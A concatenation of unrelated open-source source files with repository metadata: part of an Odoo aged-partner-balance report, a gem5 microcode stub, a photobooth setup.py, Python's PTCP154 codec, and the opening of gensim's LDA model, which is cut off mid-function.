WHERE (l.account_id=account_account.id) AND (l.move_id=am.id)\
AND (am.state IN %s)\
AND (l.partner_id IS NULL)\
AND (account_account.type IN %s)\
AND (COALESCE(l.date_maturity,l.date) > %s)\
AND ((l.reconcile_id IS NULL)\
OR (l.reconcile_id IN (SELECT recon.id FROM account_move_reconcile AS recon WHERE recon.create_date > %s AND not recon.opening_reconciliation)))\
AND '+ self.query + '\
AND account_account.active ', (tuple(move_state), tuple(self.ACCOUNT_TYPE), self.date_from, self.date_from))
t = self.cr.fetchall()
for i in t:
future_past['Unknown Partner'] = i[0]
history = []
for i in range(5):
args_list = (tuple(move_state), tuple(self.ACCOUNT_TYPE), self.date_from,)
dates_query = '(COALESCE(l.date_maturity,l.date)'
if form[str(i)]['start'] and form[str(i)]['stop']:
dates_query += ' BETWEEN %s AND %s)'
args_list += (form[str(i)]['start'], form[str(i)]['stop'])
elif form[str(i)]['start']:
dates_query += ' > %s)'
args_list += (form[str(i)]['start'],)
else:
dates_query += ' < %s)'
args_list += (form[str(i)]['stop'],)
args_list += (self.date_from,)
self.cr.execute('SELECT SUM(l.debit-l.credit)\
FROM account_move_line AS l, account_account, account_move am \
WHERE (l.account_id = account_account.id) AND (l.move_id=am.id)\
AND (am.state IN %s)\
AND (account_account.type IN %s)\
AND (l.partner_id IS NULL)\
AND ((l.reconcile_id IS NULL)\
OR (l.reconcile_id IN (SELECT recon.id FROM account_move_reconcile AS recon WHERE recon.create_date > %s AND not recon.opening_reconciliation)))\
AND '+ self.query + '\
AND account_account.active\
AND ' + dates_query + '\
AND (l.date <= %s)\
GROUP BY l.partner_id', args_list)
t = self.cr.fetchall()
d = {}
for i in t:
d['Unknown Partner'] = i[0]
history.append(d)
values = {}
if self.direction_selection == 'future':
before = False
if future_past.has_key('Unknown Partner'):
before = [ future_past['Unknown Partner'] ]
self.total_account[6] = self.total_account[6] + (before and before[0] or 0.0)
values['direction'] = before and before[0] or 0.0
elif self.direction_selection == 'past':
after = False
if future_past.has_key('Unknown Partner'):
after = [ future_past['Unknown Partner'] ]
self.total_account[6] = self.total_account[6] + (after and after[0] or 0.0)
values['direction'] = after and after[0] or 0.0
for i in range(5):
during = False
if history[i].has_key('Unknown Partner'):
during = [ history[i]['Unknown Partner'] ]
self.total_account[(i)] = self.total_account[(i)] + (during and during[0] or 0)
values[str(i)] = during and during[0] or 0.0
total = False
if totals.has_key( 'Unknown Partner' ):
total = [ totals['Unknown Partner'] ]
values['total'] = total and total[0] or 0.0
## Add for total
self.total_account[(i+1)] = self.total_account[(i+1)] + (total and total[0] or 0.0)
values['name'] = 'Unknown Partner'
if values['total']:
res.append(values)
total = 0.0
totals = {}
for r in res:
total += float(r['total'] or 0.0)
for i in range(5)+['direction']:
totals.setdefault(str(i), 0.0)
totals[str(i)] += float(r[str(i)] or 0.0)
return res
def _get_total(self,pos):
period = self.total_account[int(pos)]
return period or 0.0
def _get_direction(self,pos):
period = self.total_account[int(pos)]
return period or 0.0
def _get_for_period(self,pos):
period = self.total_account[int(pos)]
return period or 0.0
def _get_partners(self,data):
# TODO: deprecated, to remove in trunk
if data['form']['result_selection'] == 'customer':
return self._translate('Receivable Accounts')
elif data['form']['result_selection'] == 'supplier':
return self._translate('Payable Accounts')
elif data['form']['result_selection'] == 'customer_supplier':
return self._translate('Receivable and Payable Accounts')
return ''
class report_agedpartnerbalance(osv.AbstractModel):
_name = 'report.account.report_agedpartnerbalance'
_inherit = 'report.abstract_report'
_template = 'account.report_agedpartnerbalance'
_wrapped_report_class = aged_trial_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
xiaoyaozi5566/DynamicCache
|
src/arch/x86/isa/insts/simd128/floating_point/data_transfer/move_non_temporal.py
|
86
|
2162
|
# Copyright (c) 2007 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
microcode = '''
# MOVNTPS
# MOVNTPD
'''
|
bsd-3-clause
|
paulla/photomaton
|
setup.py
|
1
|
1536
|
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
import os
version = '0.1.dev0'
here = os.path.abspath(os.path.dirname(__file__))
def read_file(*pathes):
path = os.path.join(here, *pathes)
if os.path.isfile(path):
with open(path, 'r') as desc_file:
return desc_file.read()
else:
return ''
desc_files = (('README.rst',), ('docs', 'CHANGES.rst'),
('docs', 'CONTRIBUTORS.rst'))
long_description = '\n\n'.join([read_file(*pathes) for pathes in desc_files])
install_requires=['setuptools']
setup(name='paulla.paullaroid',
version=version,
description="Photomaton by PauLLA and MIPS-LAB",
long_description=long_description,
platforms = ["any"],
# Get more strings from
# http://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
"Programming Language :: Python",
"License :: OSI Approved :: BSD License",
],
keywords="photomaton, python, raspberry",
author="voileux",
author_email="[email protected]",
url="https://github.com/paulla/photomaton",
license="BSD",
packages=find_packages("src"),
package_dir = {"": "src"},
namespace_packages=["paulla"],
include_package_data=True,
zip_safe=False,
install_requires=install_requires,
entry_points="""
# -*- Entry points: -*-
[console_scripts]
paullaroid = paulla.paullaroid.photomaton:main
""",
)
# vim:set et sts=4 ts=4 tw=80:
|
mit
|
axbaretto/beam
|
venv/lib/python2.7/encodings/ptcp154.py
|
647
|
8950
|
""" Python Character Mapping Codec generated from 'PTCP154.txt' with gencodec.py.
Written by Marc-Andre Lemburg ([email protected]).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
(c) Copyright 2000 Guido van Rossum.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_map)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_map)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_map)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_map)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='ptcp154',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
0x0080: 0x0496, # CYRILLIC CAPITAL LETTER ZHE WITH DESCENDER
0x0081: 0x0492, # CYRILLIC CAPITAL LETTER GHE WITH STROKE
0x0082: 0x04ee, # CYRILLIC CAPITAL LETTER U WITH MACRON
0x0083: 0x0493, # CYRILLIC SMALL LETTER GHE WITH STROKE
0x0084: 0x201e, # DOUBLE LOW-9 QUOTATION MARK
0x0085: 0x2026, # HORIZONTAL ELLIPSIS
0x0086: 0x04b6, # CYRILLIC CAPITAL LETTER CHE WITH DESCENDER
0x0087: 0x04ae, # CYRILLIC CAPITAL LETTER STRAIGHT U
0x0088: 0x04b2, # CYRILLIC CAPITAL LETTER HA WITH DESCENDER
0x0089: 0x04af, # CYRILLIC SMALL LETTER STRAIGHT U
0x008a: 0x04a0, # CYRILLIC CAPITAL LETTER BASHKIR KA
0x008b: 0x04e2, # CYRILLIC CAPITAL LETTER I WITH MACRON
0x008c: 0x04a2, # CYRILLIC CAPITAL LETTER EN WITH DESCENDER
0x008d: 0x049a, # CYRILLIC CAPITAL LETTER KA WITH DESCENDER
0x008e: 0x04ba, # CYRILLIC CAPITAL LETTER SHHA
0x008f: 0x04b8, # CYRILLIC CAPITAL LETTER CHE WITH VERTICAL STROKE
0x0090: 0x0497, # CYRILLIC SMALL LETTER ZHE WITH DESCENDER
0x0091: 0x2018, # LEFT SINGLE QUOTATION MARK
0x0092: 0x2019, # RIGHT SINGLE QUOTATION MARK
0x0093: 0x201c, # LEFT DOUBLE QUOTATION MARK
0x0094: 0x201d, # RIGHT DOUBLE QUOTATION MARK
0x0095: 0x2022, # BULLET
0x0096: 0x2013, # EN DASH
0x0097: 0x2014, # EM DASH
0x0098: 0x04b3, # CYRILLIC SMALL LETTER HA WITH DESCENDER
0x0099: 0x04b7, # CYRILLIC SMALL LETTER CHE WITH DESCENDER
0x009a: 0x04a1, # CYRILLIC SMALL LETTER BASHKIR KA
0x009b: 0x04e3, # CYRILLIC SMALL LETTER I WITH MACRON
0x009c: 0x04a3, # CYRILLIC SMALL LETTER EN WITH DESCENDER
0x009d: 0x049b, # CYRILLIC SMALL LETTER KA WITH DESCENDER
0x009e: 0x04bb, # CYRILLIC SMALL LETTER SHHA
0x009f: 0x04b9, # CYRILLIC SMALL LETTER CHE WITH VERTICAL STROKE
0x00a1: 0x040e, # CYRILLIC CAPITAL LETTER SHORT U (Byelorussian)
0x00a2: 0x045e, # CYRILLIC SMALL LETTER SHORT U (Byelorussian)
0x00a3: 0x0408, # CYRILLIC CAPITAL LETTER JE
0x00a4: 0x04e8, # CYRILLIC CAPITAL LETTER BARRED O
0x00a5: 0x0498, # CYRILLIC CAPITAL LETTER ZE WITH DESCENDER
0x00a6: 0x04b0, # CYRILLIC CAPITAL LETTER STRAIGHT U WITH STROKE
0x00a8: 0x0401, # CYRILLIC CAPITAL LETTER IO
0x00aa: 0x04d8, # CYRILLIC CAPITAL LETTER SCHWA
0x00ad: 0x04ef, # CYRILLIC SMALL LETTER U WITH MACRON
0x00af: 0x049c, # CYRILLIC CAPITAL LETTER KA WITH VERTICAL STROKE
0x00b1: 0x04b1, # CYRILLIC SMALL LETTER STRAIGHT U WITH STROKE
0x00b2: 0x0406, # CYRILLIC CAPITAL LETTER BYELORUSSIAN-UKRAINIAN I
0x00b3: 0x0456, # CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
0x00b4: 0x0499, # CYRILLIC SMALL LETTER ZE WITH DESCENDER
0x00b5: 0x04e9, # CYRILLIC SMALL LETTER BARRED O
0x00b8: 0x0451, # CYRILLIC SMALL LETTER IO
0x00b9: 0x2116, # NUMERO SIGN
0x00ba: 0x04d9, # CYRILLIC SMALL LETTER SCHWA
0x00bc: 0x0458, # CYRILLIC SMALL LETTER JE
0x00bd: 0x04aa, # CYRILLIC CAPITAL LETTER ES WITH DESCENDER
0x00be: 0x04ab, # CYRILLIC SMALL LETTER ES WITH DESCENDER
0x00bf: 0x049d, # CYRILLIC SMALL LETTER KA WITH VERTICAL STROKE
0x00c0: 0x0410, # CYRILLIC CAPITAL LETTER A
0x00c1: 0x0411, # CYRILLIC CAPITAL LETTER BE
0x00c2: 0x0412, # CYRILLIC CAPITAL LETTER VE
0x00c3: 0x0413, # CYRILLIC CAPITAL LETTER GHE
0x00c4: 0x0414, # CYRILLIC CAPITAL LETTER DE
0x00c5: 0x0415, # CYRILLIC CAPITAL LETTER IE
0x00c6: 0x0416, # CYRILLIC CAPITAL LETTER ZHE
0x00c7: 0x0417, # CYRILLIC CAPITAL LETTER ZE
0x00c8: 0x0418, # CYRILLIC CAPITAL LETTER I
0x00c9: 0x0419, # CYRILLIC CAPITAL LETTER SHORT I
0x00ca: 0x041a, # CYRILLIC CAPITAL LETTER KA
0x00cb: 0x041b, # CYRILLIC CAPITAL LETTER EL
0x00cc: 0x041c, # CYRILLIC CAPITAL LETTER EM
0x00cd: 0x041d, # CYRILLIC CAPITAL LETTER EN
0x00ce: 0x041e, # CYRILLIC CAPITAL LETTER O
0x00cf: 0x041f, # CYRILLIC CAPITAL LETTER PE
0x00d0: 0x0420, # CYRILLIC CAPITAL LETTER ER
0x00d1: 0x0421, # CYRILLIC CAPITAL LETTER ES
0x00d2: 0x0422, # CYRILLIC CAPITAL LETTER TE
0x00d3: 0x0423, # CYRILLIC CAPITAL LETTER U
0x00d4: 0x0424, # CYRILLIC CAPITAL LETTER EF
0x00d5: 0x0425, # CYRILLIC CAPITAL LETTER HA
0x00d6: 0x0426, # CYRILLIC CAPITAL LETTER TSE
0x00d7: 0x0427, # CYRILLIC CAPITAL LETTER CHE
0x00d8: 0x0428, # CYRILLIC CAPITAL LETTER SHA
0x00d9: 0x0429, # CYRILLIC CAPITAL LETTER SHCHA
0x00da: 0x042a, # CYRILLIC CAPITAL LETTER HARD SIGN
0x00db: 0x042b, # CYRILLIC CAPITAL LETTER YERU
0x00dc: 0x042c, # CYRILLIC CAPITAL LETTER SOFT SIGN
0x00dd: 0x042d, # CYRILLIC CAPITAL LETTER E
0x00de: 0x042e, # CYRILLIC CAPITAL LETTER YU
0x00df: 0x042f, # CYRILLIC CAPITAL LETTER YA
0x00e0: 0x0430, # CYRILLIC SMALL LETTER A
0x00e1: 0x0431, # CYRILLIC SMALL LETTER BE
0x00e2: 0x0432, # CYRILLIC SMALL LETTER VE
0x00e3: 0x0433, # CYRILLIC SMALL LETTER GHE
0x00e4: 0x0434, # CYRILLIC SMALL LETTER DE
0x00e5: 0x0435, # CYRILLIC SMALL LETTER IE
0x00e6: 0x0436, # CYRILLIC SMALL LETTER ZHE
0x00e7: 0x0437, # CYRILLIC SMALL LETTER ZE
0x00e8: 0x0438, # CYRILLIC SMALL LETTER I
0x00e9: 0x0439, # CYRILLIC SMALL LETTER SHORT I
0x00ea: 0x043a, # CYRILLIC SMALL LETTER KA
0x00eb: 0x043b, # CYRILLIC SMALL LETTER EL
0x00ec: 0x043c, # CYRILLIC SMALL LETTER EM
0x00ed: 0x043d, # CYRILLIC SMALL LETTER EN
0x00ee: 0x043e, # CYRILLIC SMALL LETTER O
0x00ef: 0x043f, # CYRILLIC SMALL LETTER PE
0x00f0: 0x0440, # CYRILLIC SMALL LETTER ER
0x00f1: 0x0441, # CYRILLIC SMALL LETTER ES
0x00f2: 0x0442, # CYRILLIC SMALL LETTER TE
0x00f3: 0x0443, # CYRILLIC SMALL LETTER U
0x00f4: 0x0444, # CYRILLIC SMALL LETTER EF
0x00f5: 0x0445, # CYRILLIC SMALL LETTER HA
0x00f6: 0x0446, # CYRILLIC SMALL LETTER TSE
0x00f7: 0x0447, # CYRILLIC SMALL LETTER CHE
0x00f8: 0x0448, # CYRILLIC SMALL LETTER SHA
0x00f9: 0x0449, # CYRILLIC SMALL LETTER SHCHA
0x00fa: 0x044a, # CYRILLIC SMALL LETTER HARD SIGN
0x00fb: 0x044b, # CYRILLIC SMALL LETTER YERU
0x00fc: 0x044c, # CYRILLIC SMALL LETTER SOFT SIGN
0x00fd: 0x044d, # CYRILLIC SMALL LETTER E
0x00fe: 0x044e, # CYRILLIC SMALL LETTER YU
0x00ff: 0x044f, # CYRILLIC SMALL LETTER YA
})
### Encoding Map
encoding_map = codecs.make_encoding_map(decoding_map)
|
apache-2.0
|
summanlp/gensim
|
gensim/models/ldamodel.py
|
1
|
53431
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011 Radim Rehurek <[email protected]>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
**For a faster implementation of LDA (parallelized for multicore machines), see** :mod:`gensim.models.ldamulticore`.
Latent Dirichlet Allocation (LDA) in Python.
This module allows both LDA model estimation from a training corpus and inference of topic
distribution on new, unseen documents. The model can also be updated with new documents
for online training.
The core estimation code is based on the `onlineldavb.py` script by M. Hoffman [1]_, see
**Hoffman, Blei, Bach: Online Learning for Latent Dirichlet Allocation, NIPS 2010.**
The algorithm:
* is **streamed**: training documents may come in sequentially, no random access required,
* runs in **constant memory** w.r.t. the number of documents: size of the
training corpus does not affect memory footprint, can process corpora larger than RAM, and
* is **distributed**: makes use of a cluster of machines, if available, to
speed up model estimation.
.. [1] http://www.cs.princeton.edu/~mdhoffma
"""
import logging
import numbers
import os
import numpy as np
import six
from scipy.special import gammaln, psi # gamma function utils
from scipy.special import polygamma
from six.moves import xrange
from collections import defaultdict
from gensim import interfaces, utils, matutils
from gensim.matutils import dirichlet_expectation
from gensim.matutils import kullback_leibler, hellinger, jaccard_distance, jensen_shannon
from gensim.models import basemodel, CoherenceModel
from gensim.models.callbacks import Callback
# log(sum(exp(x))) that tries to avoid overflow
try:
# try importing from here if older scipy is installed
from scipy.maxentropy import logsumexp
except ImportError:
# maxentropy has been removed in recent releases, logsumexp now in misc
from scipy.misc import logsumexp
logger = logging.getLogger('gensim.models.ldamodel')
def update_dir_prior(prior, N, logphat, rho):
"""
Updates a given prior using Newton's method, described in
**Huang: Maximum Likelihood Estimation of Dirichlet Distribution Parameters.**
http://jonathan-huang.org/research/dirichlet/dirichlet.pdf
"""
dprior = np.copy(prior)
gradf = N * (psi(np.sum(prior)) - psi(prior) + logphat)
c = N * polygamma(1, np.sum(prior))
q = -N * polygamma(1, prior)
b = np.sum(gradf / q) / (1 / c + np.sum(1 / q))
dprior = -(gradf - b) / q
if all(rho * dprior + prior > 0):
prior += rho * dprior
else:
logger.warning("updated prior not positive")
return prior
class LdaState(utils.SaveLoad):
"""
Encapsulate information for distributed computation of LdaModel objects.
Objects of this class are sent over the network, so try to keep them lean to
reduce traffic.
"""
def __init__(self, eta, shape):
self.eta = eta
self.sstats = np.zeros(shape)
self.numdocs = 0
def reset(self):
"""
Prepare the state for a new EM iteration (reset sufficient stats).
"""
self.sstats[:] = 0.0
self.numdocs = 0
def merge(self, other):
"""
Merge the result of an E step from one node with that of another node
(summing up sufficient statistics).
The merging is trivial and after merging all cluster nodes, we have the
exact same result as if the computation was run on a single node (no
approximation).
"""
assert other is not None
self.sstats += other.sstats
self.numdocs += other.numdocs
def blend(self, rhot, other, targetsize=None):
"""
Given LdaState `other`, merge it with the current state. Stretch both to
`targetsize` documents before merging, so that they are of comparable
magnitude.
Merging is done by average weighting: in the extremes, `rhot=0.0` means
`other` is completely ignored; `rhot=1.0` means `self` is completely ignored.
This procedure corresponds to the stochastic gradient update from Hoffman
et al., algorithm 2 (eq. 14).
"""
assert other is not None
if targetsize is None:
targetsize = self.numdocs
# stretch the current model's expected n*phi counts to target size
if self.numdocs == 0 or targetsize == self.numdocs:
scale = 1.0
else:
scale = 1.0 * targetsize / self.numdocs
self.sstats *= (1.0 - rhot) * scale
# stretch the incoming n*phi counts to target size
if other.numdocs == 0 or targetsize == other.numdocs:
scale = 1.0
else:
logger.info("merging changes from %i documents into a model of %i documents",
other.numdocs, targetsize)
scale = 1.0 * targetsize / other.numdocs
self.sstats += rhot * scale * other.sstats
self.numdocs = targetsize
def blend2(self, rhot, other, targetsize=None):
"""
Alternative, more simple blend.
"""
assert other is not None
if targetsize is None:
targetsize = self.numdocs
# merge the two matrices by summing
self.sstats += other.sstats
self.numdocs = targetsize
def get_lambda(self):
return self.eta + self.sstats
def get_Elogbeta(self):
return dirichlet_expectation(self.get_lambda())
# endclass LdaState
class LdaModel(interfaces.TransformationABC, basemodel.BaseTopicModel):
"""
The constructor estimates Latent Dirichlet Allocation model parameters based
on a training corpus:
>>> lda = LdaModel(corpus, num_topics=10)
You can then infer topic distributions on new, unseen documents, with
>>> doc_lda = lda[doc_bow]
The model can be updated (trained) with new documents via
>>> lda.update(other_corpus)
Model persistency is achieved through its `load`/`save` methods.
"""
def __init__(self, corpus=None, num_topics=100, id2word=None,
distributed=False, chunksize=2000, passes=1, update_every=1,
alpha='symmetric', eta=None, decay=0.5, offset=1.0, eval_every=10,
iterations=50, gamma_threshold=0.001, minimum_probability=0.01,
random_state=None, ns_conf=None, minimum_phi_value=0.01,
per_word_topics=False, callbacks=None):
"""
If given, start training from the iterable `corpus` straight away. If not given,
the model is left untrained (presumably because you want to call `update()` manually).
`num_topics` is the number of requested latent topics to be extracted from
the training corpus.
`id2word` is a mapping from word ids (integers) to words (strings). It is
used to determine the vocabulary size, as well as for debugging and topic
printing.
`alpha` and `eta` are hyperparameters that affect sparsity of the document-topic
(theta) and topic-word (lambda) distributions. Both default to a symmetric
1.0/num_topics prior.
`alpha` can be set to an explicit array = prior of your choice. It also
support special values of 'asymmetric' and 'auto': the former uses a fixed
normalized asymmetric 1.0/topicno prior, the latter learns an asymmetric
prior directly from your data.
`eta` can be a scalar for a symmetric prior over topic/word
distributions, or a vector of shape num_words, which can be used to
impose (user defined) asymmetric priors over the word distribution.
It also supports the special value 'auto', which learns an asymmetric
prior over words directly from your data. `eta` can also be a matrix
of shape num_topics x num_words, which can be used to impose
asymmetric priors over the word distribution on a per-topic basis
(can not be learned from data).
Turn on `distributed` to force distributed computing (see the `web tutorial <http://radimrehurek.com/gensim/distributed.html>`_
on how to set up a cluster of machines for gensim).
Calculate and log perplexity estimate from the latest mini-batch every
`eval_every` model updates (setting this to 1 slows down training ~2x;
default is 10 for better performance). Set to None to disable perplexity estimation.
`decay` and `offset` parameters are the same as Kappa and Tau_0 in
Hoffman et al, respectively.
`minimum_probability` controls filtering the topics returned for a document (bow).
`random_state` can be a np.random.RandomState object or the seed for one
`callbacks` a list of metric callbacks to log/visualize evaluation metrics of topic model during training
Example:
>>> lda = LdaModel(corpus, num_topics=100) # train model
>>> print(lda[doc_bow]) # get topic probability distribution for a document
>>> lda.update(corpus2) # update the LDA model with additional documents
>>> print(lda[doc_bow])
>>> lda = LdaModel(corpus, num_topics=50, alpha='auto', eval_every=5) # train asymmetric alpha from data
"""
# store user-supplied parameters
self.id2word = id2word
if corpus is None and self.id2word is None:
raise ValueError('at least one of corpus/id2word must be specified, to establish input space dimensionality')
if self.id2word is None:
logger.warning("no word id mapping provided; initializing from corpus, assuming identity")
self.id2word = utils.dict_from_corpus(corpus)
self.num_terms = len(self.id2word)
elif len(self.id2word) > 0:
self.num_terms = 1 + max(self.id2word.keys())
else:
self.num_terms = 0
if self.num_terms == 0:
raise ValueError("cannot compute LDA over an empty collection (no terms)")
self.distributed = bool(distributed)
self.num_topics = int(num_topics)
self.chunksize = chunksize
self.decay = decay
self.offset = offset
self.minimum_probability = minimum_probability
self.num_updates = 0
self.passes = passes
self.update_every = update_every
self.eval_every = eval_every
self.minimum_phi_value = minimum_phi_value
self.per_word_topics = per_word_topics
self.callbacks = callbacks
self.alpha, self.optimize_alpha = self.init_dir_prior(alpha, 'alpha')
assert self.alpha.shape == (self.num_topics,), "Invalid alpha shape. Got shape %s, but expected (%d, )" % (str(self.alpha.shape), self.num_topics)
if isinstance(eta, six.string_types):
if eta == 'asymmetric':
raise ValueError("The 'asymmetric' option cannot be used for eta")
self.eta, self.optimize_eta = self.init_dir_prior(eta, 'eta')
self.random_state = utils.get_random_state(random_state)
assert self.eta.shape == (self.num_terms,) or self.eta.shape == (self.num_topics, self.num_terms), (
"Invalid eta shape. Got shape %s, but expected (%d, 1) or (%d, %d)" %
(str(self.eta.shape), self.num_terms, self.num_topics, self.num_terms))
# VB constants
self.iterations = iterations
self.gamma_threshold = gamma_threshold
# set up distributed environment if necessary
if not distributed:
logger.info("using serial LDA version on this node")
self.dispatcher = None
self.numworkers = 1
else:
if self.optimize_alpha:
raise NotImplementedError("auto-optimizing alpha not implemented in distributed LDA")
# set up distributed version
try:
import Pyro4
if ns_conf is None:
ns_conf = {}
with utils.getNS(**ns_conf) as ns:
from gensim.models.lda_dispatcher import LDA_DISPATCHER_PREFIX
self.dispatcher = Pyro4.Proxy(ns.list(prefix=LDA_DISPATCHER_PREFIX)[LDA_DISPATCHER_PREFIX])
logger.debug("looking for dispatcher at %s" % str(self.dispatcher._pyroUri))
self.dispatcher.initialize(id2word=self.id2word, num_topics=self.num_topics,
chunksize=chunksize, alpha=alpha, eta=eta, distributed=False)
self.numworkers = len(self.dispatcher.getworkers())
logger.info("using distributed version with %i workers" % self.numworkers)
except Exception as err:
logger.error("failed to initialize distributed LDA (%s)", err)
raise RuntimeError("failed to initialize distributed LDA (%s)" % err)
# Initialize the variational distribution q(beta|lambda)
self.state = LdaState(self.eta, (self.num_topics, self.num_terms))
self.state.sstats = self.random_state.gamma(100., 1. / 100., (self.num_topics, self.num_terms))
self.expElogbeta = np.exp(dirichlet_expectation(self.state.sstats))
# if a training corpus was provided, start estimating the model right away
if corpus is not None:
use_numpy = self.dispatcher is not None
self.update(corpus, chunks_as_numpy=use_numpy)
def init_dir_prior(self, prior, name):
if prior is None:
prior = 'symmetric'
if name == 'alpha':
prior_shape = self.num_topics
elif name == 'eta':
prior_shape = self.num_terms
else:
raise ValueError("'name' must be 'alpha' or 'eta'")
is_auto = False
if isinstance(prior, six.string_types):
if prior == 'symmetric':
logger.info("using symmetric %s at %s", name, 1.0 / prior_shape)
init_prior = np.asarray([1.0 / self.num_topics for i in xrange(prior_shape)])
elif prior == 'asymmetric':
init_prior = np.asarray([1.0 / (i + np.sqrt(prior_shape)) for i in xrange(prior_shape)])
init_prior /= init_prior.sum()
logger.info("using asymmetric %s %s", name, list(init_prior))
elif prior == 'auto':
is_auto = True
init_prior = np.asarray([1.0 / self.num_topics for i in xrange(prior_shape)])
if name == 'alpha':
logger.info("using autotuned %s, starting with %s", name, list(init_prior))
else:
raise ValueError("Unable to determine proper %s value given '%s'" % (name, prior))
elif isinstance(prior, list):
init_prior = np.asarray(prior)
elif isinstance(prior, np.ndarray):
init_prior = prior
elif isinstance(prior, np.number) or isinstance(prior, numbers.Real):
init_prior = np.asarray([prior] * prior_shape)
else:
raise ValueError("%s must be either a np array of scalars, list of scalars, or scalar" % name)
return init_prior, is_auto
def __str__(self):
return "LdaModel(num_terms=%s, num_topics=%s, decay=%s, chunksize=%s)" % \
(self.num_terms, self.num_topics, self.decay, self.chunksize)
def sync_state(self):
self.expElogbeta = np.exp(self.state.get_Elogbeta())
def clear(self):
"""Clear model state (free up some memory). Used in the distributed algo."""
self.state = None
self.Elogbeta = None
def inference(self, chunk, collect_sstats=False):
"""
Given a chunk of sparse document vectors, estimate gamma (parameters
controlling the topic weights) for each document in the chunk.
This function does not modify the model (=is read-only aka const). The
whole input chunk of document is assumed to fit in RAM; chunking of a
large corpus must be done earlier in the pipeline.
If `collect_sstats` is True, also collect sufficient statistics needed
to update the model's topic-word distributions, and return a 2-tuple
`(gamma, sstats)`. Otherwise, return `(gamma, None)`. `gamma` is of shape
`len(chunk) x self.num_topics`.
Avoids computing the `phi` variational parameter directly using the
optimization presented in **Lee, Seung: Algorithms for non-negative matrix factorization, NIPS 2001**.
"""
try:
_ = len(chunk)
except Exception:
# convert iterators/generators to plain list, so we have len() etc.
chunk = list(chunk)
if len(chunk) > 1:
logger.debug("performing inference on a chunk of %i documents", len(chunk))
# Initialize the variational distribution q(theta|gamma) for the chunk
gamma = self.random_state.gamma(100., 1. / 100., (len(chunk), self.num_topics))
Elogtheta = dirichlet_expectation(gamma)
expElogtheta = np.exp(Elogtheta)
if collect_sstats:
sstats = np.zeros_like(self.expElogbeta)
else:
sstats = None
converged = 0
# Now, for each document d update that document's gamma and phi
# Inference code copied from Hoffman's `onlineldavb.py` (esp. the
# Lee&Seung trick which speeds things up by an order of magnitude, compared
# to Blei's original LDA-C code, cool!).
for d, doc in enumerate(chunk):
if len(doc) > 0 and not isinstance(doc[0][0], six.integer_types + (np.integer,)):
# make sure the term IDs are ints, otherwise np will get upset
ids = [int(id) for id, _ in doc]
else:
ids = [id for id, _ in doc]
cts = np.array([cnt for _, cnt in doc])
gammad = gamma[d, :]
Elogthetad = Elogtheta[d, :]
expElogthetad = expElogtheta[d, :]
expElogbetad = self.expElogbeta[:, ids]
# The optimal phi_{dwk} is proportional to expElogthetad_k * expElogbetad_w.
# phinorm is the normalizer.
# TODO treat zeros explicitly, instead of adding 1e-100?
phinorm = np.dot(expElogthetad, expElogbetad) + 1e-100
# Iterate between gamma and phi until convergence
for _ in xrange(self.iterations):
lastgamma = gammad
# We represent phi implicitly to save memory and time.
# Substituting the value of the optimal phi back into
# the update for gamma gives this update. Cf. Lee&Seung 2001.
gammad = self.alpha + expElogthetad * np.dot(cts / phinorm, expElogbetad.T)
Elogthetad = dirichlet_expectation(gammad)
expElogthetad = np.exp(Elogthetad)
phinorm = np.dot(expElogthetad, expElogbetad) + 1e-100
# If gamma hasn't changed much, we're done.
meanchange = np.mean(abs(gammad - lastgamma))
if (meanchange < self.gamma_threshold):
converged += 1
break
